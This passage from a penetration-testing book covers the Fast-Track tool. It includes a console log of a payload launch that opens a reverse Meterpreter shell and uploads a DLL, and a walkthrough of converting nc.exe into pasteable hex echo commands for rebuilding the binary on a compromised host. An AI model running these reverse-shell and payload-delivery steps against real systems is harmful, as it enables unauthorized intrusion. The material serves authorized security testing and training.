background image

174

Chapter 11

. . . SNIP . . .

Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (718347 bytes)...
[*] Upload completed.

 [*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1031)

meterpreter >

Binary-to-Hex Generator

The binary-to-hex generator is useful when you already have access to a sys-
tem and you want to deliver an executable to the remote file system. Point 
Fast-Track to the executable, and it will generate a text file that you can copy 
and paste to the target operating system. To convert the hexadecimal back to 
a binary and execute it, choose option 6 as shown at   below.

 Enter the number: 

6

Binary to Hex Generator v0.1

. . . SNIP . . .

 Enter the path to the file you want to convert to hex: 

/pentest/exploits/

fasttrack/nc.exe

Finished...
Opening text editor...

// Output will look like this

 DEL T 1>NUL 2>NUL

echo EDS:0 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00>>T
echo EDS:10 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00>>T
echo FDS:20 L 10 00>>T
echo EDS:30 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00>>T
echo EDS:40 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68>>T
echo EDS:50 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F>>T
echo EDS:60 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20>>T
echo EDS:70 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00>>T

After selecting the 

Binary to Hex Payload Converter

, point Fast-Track to the 

binary you want to convert at   and wait for the magic. At this point, you can 
simply copy and paste the output from   into an existing shell window.